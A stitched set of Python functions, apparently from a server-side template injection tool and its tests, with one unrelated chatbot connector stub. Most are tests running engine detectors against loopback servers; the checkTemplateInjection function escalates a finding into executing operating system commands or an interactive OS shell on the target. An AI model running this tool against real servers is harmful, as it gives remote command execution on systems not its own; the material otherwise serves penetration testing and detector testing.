def _on_schedule(self):
    """Hook called repeatedly from an event loop.

    The body returns immediately, so every statement after the ``return``
    is unreachable. Those statements only illustrate how
    ``_push_received_message()`` and ``_pop_message_to_send()`` are used.
    """
    return

    # sender/receiver/stream id's are automatically translated by the base class Connector
    # when calling methods _pop_message_to_send() and _push_received_message()

    # example of incoming message for the bot in private
    message = Message.build('Hi @globot please ask for service #sample')
    channel = Channel(11, 0, None, self.get_name())
    self._push_received_message(message, channel)

    # example of incoming message for the bot in chatroom
    message = Message.build('Hi @globot please ask for service #sample')
    channel = Channel(60, 0, 777, self.get_name())
    self._push_received_message(message, channel)

    # example of incoming message in chatroom for another agent
    message = Message.build('Hi folks nothing new today')
    channel = Channel(11, 60, 777, self.get_name())
    self._push_received_message(message, channel)

    # example of outgoing message
    while True:
        ret = self._pop_message_to_send()
        # stop once _pop_message_to_send() returns None
        if ret is None:
            break
        (message, channel) = ret
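def test_reflection(self):
    """Velocity detection on the loopback endpoint must yield ``expected_data``.

    The ``inj`` query parameter carries ``*``, presumably the injection
    marker. The unused ``template`` local of the original was removed.
    """
    channel = Channel({'url': 'http://127.0.0.1:15003/velocity?inj=*'})
    Velocity(channel).detect()
    self.assertEqual(channel.data, self.expected_data)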
def test_reflection_unsecured(self):
    """Run Twig detection on the loopback PHP page and compare the result."""
    # NOTE(review): the test name says "unsecured" but the URL requests the
    # "-secured" page -- confirm which page is intended.
    options = {
        'url': 'http://127.0.0.1:15002/twig-1.24.1-secured.php?inj=*',
    }
    chan = Channel(options)
    detector = Twig(chan)
    detector.detect()
    self.assertEqual(chan.data, self.expected_data)
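def test_reflection_within_text(self):
    """Freemarker detection on the loopback endpoint, compared without ``os``."""
    # NOTE(review): despite the name, no surrounding text is sent. The
    # original assigned an unused 'AAAA%sAAAA' template and never applied it
    # to the URL; the dead local was removed -- confirm the intended coverage.
    channel = Channel({'url': 'http://127.0.0.1:15003/freemarker?inj=*'})
    Freemarker(channel).detect()
    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del channel.data['os']
    self.assertEqual(channel.data, self.expected_data)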
def main():
    """Entry point: require a URL option, then start the template checks."""
    options = vars(cliparser.options)

    url_given = bool(options.get('url'))
    if not url_given:
        # Report the missing option through the parser's own error path.
        cliparser.parser.error('URL is required. Run with -h for help.')

    channel = Channel(options)
    checks.check_template_injection(channel)
def test_reflection_context_text(self):
    """Jinja2 detection with the ``tpl`` parameter set to ``AAAA%sAAAA``."""
    tpl = 'AAAA%sAAAA'
    target = 'http://127.0.0.1:15001/reflect/jinja2?tpl=%s&inj=*' % tpl

    chan = Channel({'url': target})
    detector = Jinja2(chan)
    detector.detect()

    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del chan.data['os']
    self.assertEqual(chan.data, self.expected_data)
def test_reflection_unsecured(self):
    """Smarty detection on the "unsecured" loopback PHP page."""
    options = {
        'url': 'http://127.0.0.1:15002/smarty-3.1.29-unsecured.php?inj=*',
    }
    chan = Channel(options)
    detector = Smarty(chan)
    detector.detect()

    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del chan.data['os']
    self.assertEqual(chan.data, self.expected_data)
def test_no_reflection(self):
    """Detection must record nothing for a URL that carries no ``*`` tag."""
    options = {
        'url': 'http://127.0.0.1:15001/reflect/mako?inj2=asd2',
        'force_level': [0, 0],
        'injection_tag': '*',
    }
    chan = Channel(options)
    detect_template_injection(chan, [Mako])

    # An empty dict means no finding was stored on the channel.
    self.assertEqual(chan.data, {})
def test_reflection_secured(self):
    """Smarty detection on the "secured" page must lack ``eval`` and ``exec``."""
    options = {
        'url': 'http://127.0.0.1:15002/smarty-3.1.29-secured.php?inj=*',
    }
    chan = Channel(options)
    Smarty(chan).detect()

    # Start from the shared expectation and strip the two capabilities that
    # are expected to be absent on this page.
    wanted = self.expected_data.copy()
    for capability in ('eval', 'exec'):
        del wanted[capability]

    self.assertEqual(chan.data, wanted)
def _get_detection_obj_data(self, url, level=0, closure_level=0):
    """Run ``self.plugin`` detection on *url* and return ``(plugin, data)``.

    ``level`` and ``closure_level`` are passed to the channel as the
    two-element ``force_level`` option.
    """
    options = {
        'url': url,
        'force_level': [level, closure_level],
    }
    chan = Channel(options)

    plugin_obj = self.plugin(chan)
    plugin_obj.detect()

    # Delete OS to make the tests portable
    if 'os' in chan.data:
        del chan.data['os']

    return plugin_obj, chan.data
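def test_header_reflection(self):
    """Mako detection with the ``*`` marker placed in the User-Agent header.

    The unused ``template`` local of the original was removed.
    """
    channel = Channel({
        'url': 'http://127.0.0.1:15001/header/mako',
        'headers': ['User-Agent: *'],
    })
    Mako(channel).detect()
    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del channel.data['os']
    self.assertEqual(channel.data, self.expected_data)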
def test_quotes(self):
    """Check a command containing quote characters via both execution paths.

    The same command string is sent through ``execute()`` on the reflected
    endpoint, where the exact output is compared, and through
    ``execute_blind()`` on the blind endpoint, where only a truthy result
    is required.
    """
    command = """echo 1"2"'3'\\"\\'"""

    reflected = Channel({
        'url': 'http://127.0.0.1:15001/reflect/mako?inj=asd',
        'force_level': [0, 0],
        'injection_tag': '*',
    })
    plugin = detect_template_injection(reflected, [Mako])
    output = plugin.execute(command)
    self.assertEqual(output, """123"'""")

    blind = Channel({
        'url': 'http://127.0.0.1:15001/blind/mako?inj=asd',
        'force_level': [0, 0],
        'injection_tag': '*',
    })
    plugin = detect_template_injection(blind, [Mako])
    self.assertTrue(plugin.execute_blind(command))
def test_reflection_multiple_point_no_tag(self):
    """Mako detection on a URL with two parameters and no ``*`` tag in it."""
    options = {
        'url': 'http://127.0.0.1:15001/reflect/mako?inj=asd&inj2=asd2',
        'force_level': [0, 0],
        'injection_tag': '*',
    }
    chan = Channel(options)
    detect_template_injection(chan, [Mako])

    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del chan.data['os']
    self.assertEqual(chan.data, self.expected_data)
def test_reflection_point_dont_startswith(self):
    """Detection must record nothing when ``inj`` holds only the ``*`` tag.

    The ``startswith`` parameter names a prefix (``thismustexists``) that the
    ``inj`` value in this URL does not begin with.
    """
    options = {
        'url': 'http://127.0.0.1:15001/startswith/mako?inj=*&startswith=thismustexists',
        'force_level': [0, 0],
        'injection_tag': '*',
    }
    chan = Channel(options)
    detect_template_injection(chan, [Mako])

    self.assertEqual(chan.data, {})
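def test_post_reflection(self):
    """Mako detection with ``inj=*`` supplied through the ``post_data`` option.

    The unused ``template`` local of the original was removed.
    """
    channel = Channel({
        'url': 'http://127.0.0.1:15001/post/mako',
        'post_data': ['inj=*'],
    })
    Mako(channel).detect()
    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del channel.data['os']
    self.assertEqual(channel.data, self.expected_data)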
def test_reflection(self):
    """Mako detection with the ``tpl`` parameter set to a bare ``%s``."""
    tpl = '%s'
    target = 'http://127.0.0.1:15001/reflect/mako?tpl=%s&inj=*' % tpl

    chan = Channel({'url': target})
    detector = Mako(chan)
    detector.detect()

    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del chan.data['os']
    self.assertEqual(chan.data, self.expected_data)
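def test_post_reflection(self):
    """Mako detection with the ``*`` marker inside the ``data`` option.

    The unused ``template`` local of the original was removed.
    """
    channel = Channel({
        'url': 'http://127.0.0.1:15001/post/mako',
        'force_level': [0, 0],
        'data': 'inj=*&othervar=1',
    })
    Mako(channel).detect()
    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del channel.data['os']
    self.assertEqual(channel.data, self.expected_data)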
def test_reflection_quotes(self):
    """Check how double quotes in a command come back from ``execute()``.

    Unescaped quotes are expected to vanish from the output; a
    backslash-escaped quote is expected to come back as a literal quote.
    """
    chan = Channel({
        'url': 'http://127.0.0.1:15001/reflect/jinja2?&inj=*',
    })
    plugin = Jinja2(chan)

    cases = (
        ('echo 1"2"', '12'),
        ('echo 1\\"2', '1"2'),
    )
    for command, expected in cases:
        self.assertEqual(plugin.execute(command), expected)
def test_reflection_point_startswith(self):
    """Mako detection when ``inj`` begins with the prefix named by ``startswith``."""
    options = {
        'url': 'http://127.0.0.1:15001/startswith/mako?inj=thismustexists*&startswith=thismustexists',
        'force_level': [0, 0],
        'injection_tag': '*',
        'technique': 'R',
    }
    chan = Channel(options)
    detect_template_injection(chan, [Mako])

    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del chan.data['os']
    self.assertEqual(chan.data, self.expected_data)
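def checkTemplateInjection(args):
    """Detect a template engine behind the channel and run the requested action.

    Args:
        args: dict of parsed options. The whole dict is handed to
            ``Channel``; the keys read here are ``os_cmd``, ``os_shell``,
            ``tpl_code`` and ``tpl_shell``.

    Every class in ``plugins`` is tried in order until one stores an
    ``engine`` entry in ``channel.data``. If none does, a fatal message is
    logged and the function returns. Otherwise the OS-command actions run
    only when ``channel.data['exec']`` is set, and the template-code actions
    run whenever an engine was detected.
    """
    channel = Channel(args)
    current_plugin = None

    # Iterate all the available plugins until
    # the first template engine is detected.
    for plugin in plugins:
        current_plugin = plugin(channel)
        current_plugin.detect()
        if channel.data.get('engine'):
            break

    # Stop here if no engine has been found
    if not channel.data.get('engine'):
        log.fatal(
            """Tested parameters appear to be not injectable. Try to increase '--level' value to perform more tests."""
        )
        return

    # If no operating system action was requested, only report the finding
    if not any(f for f, v in args.items() if f in ('os_cmd', 'os_shell') and v):
        log.warn("""Tested parameters have been found injectable.""")
        if channel.data.get('exec'):
            log.warn(
                """Try options '--os-cmd' or '--os-shell' to access the underlying operating system."""
            )

    # Execute operating system commands
    if channel.data.get('exec'):
        if args.get('os_cmd'):
            # print(...) with one argument behaves the same as the Python 2
            # print statement used originally.
            print(current_plugin.execute(args.get('os_cmd')))
        elif args.get('os_shell'):
            log.warn('Run commands on the operating system.')
            Shell(current_plugin.execute, '%s $ ' % (channel.data.get('os', ''))).cmdloop()

    # Inject template code
    if channel.data.get('engine'):
        if args.get('tpl_code'):
            # Forward the tpl_code value that this branch tests for. The
            # original forwarded os_cmd here, which may be unset.
            print(current_plugin.inject(args.get('tpl_code')))
        elif args.get('tpl_shell'):
            log.warn(
                'Inject multi-line template code. Double empty line to send the data.'
            )
            MultilineShell(current_plugin.inject, '%s $ ' % (channel.data.get('engine', ''))).cmdloop()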
def test_wrong_auth_reflection(self):
    """Detection must record nothing when the cookie is ``SID=WRONGSECRET``."""
    options = {
        'url': 'http://localhost:15001/reflect_cookieauth/mako?inj=asd*',
        'force_level': [0, 0],
        'headers': ['Cookie: SID=WRONGSECRET'],
        'injection_tag': '*',
        'technique': 'R',
    }
    chan = Channel(options)
    detect_template_injection(chan, [Mako])

    # An empty dict means no finding was stored on the channel.
    self.assertEqual(chan.data, {})
def test_url_reflection(self):
    """Mako detection with the ``*`` tag inside the URL path (``AA*AA``)."""
    options = {
        'url': 'http://127.0.0.1:15001/url/mako/AA*AA',
        'force_level': [0, 0],
        'injection_tag': '*',
        'technique': 'R',
    }
    chan = Channel(options)
    detect_template_injection(chan, [Mako])

    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del chan.data['os']
    self.assertEqual(chan.data, self.expected_data)
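def test_reflection_multiple_point(self):
    """Mako detection on a URL where several parameters carry the ``*`` tag.

    The unused ``template`` local of the original was removed.
    """
    channel = Channel({
        # The URL is passed as written: the "%s" after "tpl=" is not
        # interpolated in this test.
        'url': 'http://127.0.0.1:15001/reflect/mako?tpl=%s&asd=1&asd2=*&inj=*&inj2=*&inj3=*',
        'force_level': [0, 0],
        'injection_tag': '*',
    })
    detect_template_injection(channel, [Mako])
    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del channel.data['os']
    self.assertEqual(channel.data, self.expected_data)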
def test_reflection_limit(self):
    """On the ``limit`` endpoint only ``render_tag`` is expected in the result."""
    tpl = '%s'
    target = 'http://127.0.0.1:15001/limit/mako?tpl=%s&inj=*' % tpl

    chan = Channel({'url': target})
    Mako(chan).detect()

    # Compare against a one-key dict built from the shared expectation.
    wanted = {'render_tag': self.expected_data['render_tag']}
    self.assertEqual(chan.data, wanted)
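def test_custom_injection_tag(self):
    """Mako detection with ``~`` configured as the injection tag.

    The unused ``template`` local of the original was removed.
    """
    channel = Channel({
        # The URL is passed as written: the "%s" after "tpl=" is not
        # interpolated in this test.
        'url': 'http://127.0.0.1:15001/reflect/mako?tpl=%s&inj=~',
        'force_level': [0, 0],
        'injection_tag': '~',
    })
    detect_template_injection(channel, [Mako])
    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del channel.data['os']
    self.assertEqual(channel.data, self.expected_data)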
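def test_header_reflection(self):
    """Mako detection with the ``*`` tag placed in the User-Agent header.

    The unused ``template`` local of the original was removed.
    """
    channel = Channel({
        'url': 'http://127.0.0.1:15001/header/mako',
        'force_level': [0, 0],
        'headers': ['User-Agent: *'],
        'injection_tag': '*',
    })
    detect_template_injection(channel, [Mako])
    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del channel.data['os']
    self.assertEqual(channel.data, self.expected_data)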
def _get_detection_obj_data(self, url, level = 5):
    """Run ``self.plugin`` detection on *url* and return ``(plugin, data)``.

    ``level`` is written into the plugin's ``channel.args`` after the plugin
    is constructed and before ``detect()`` runs.
    """
    chan = Channel({'url': url})

    plugin_obj = self.plugin(chan)
    plugin_obj.channel.args['level'] = level
    plugin_obj.detect()

    # Delete OS to make the tests portable
    if 'os' in chan.data:
        del chan.data['os']

    return plugin_obj, chan.data
def test_reflection_context_code(self):
    """Jinja2 detection with the ``tpl`` parameter set to ``{{%s}}``.

    The expected result is the shared expectation with ``prefix`` and
    ``suffix`` overridden.
    """
    tpl = '{{%s}}'
    target = 'http://127.0.0.1:15001/reflect/jinja2?tpl=%s&inj=*' % tpl

    chan = Channel({'url': target})
    Jinja2(chan).detect()

    wanted = self.expected_data.copy()
    wanted['prefix'] = '""}}'
    wanted['suffix'] = '{{""'

    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del chan.data['os']
    self.assertEqual(chan.data, wanted)
def _get_detection_obj_data(self, url, level = 0, closure_level = 0):
    """Run detection for ``self.plugin`` on *url* and return ``(obj, data)``.

    ``obj`` is whatever ``detect_template_injection()`` returns for the
    single-plugin list; ``data`` is ``channel.data`` with ``os`` removed.
    """
    options = {
        'url': url,
        'force_level': [level, closure_level],
        'injection_tag': '*',
    }
    chan = Channel(options)
    detected = detect_template_injection(chan, [self.plugin])

    # Delete OS to make the tests portable
    if 'os' in chan.data:
        del chan.data['os']

    return detected, chan.data
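def test_put_reflection(self):
    """Mako detection with the ``*`` tag in the body of a PUT request.

    The unused ``template`` local of the original was removed.
    """
    channel = Channel({
        'url': 'http://127.0.0.1:15001/put/mako',
        'data': 'inj=*&othervar=1',
        'request': 'PUT',
        'force_level': [0, 0],
        'injection_tag': '*',
    })
    detect_template_injection(channel, [Mako])
    # Drop the detected 'os' entry before comparing (presumably host-dependent).
    del channel.data['os']
    self.assertEqual(channel.data, self.expected_data)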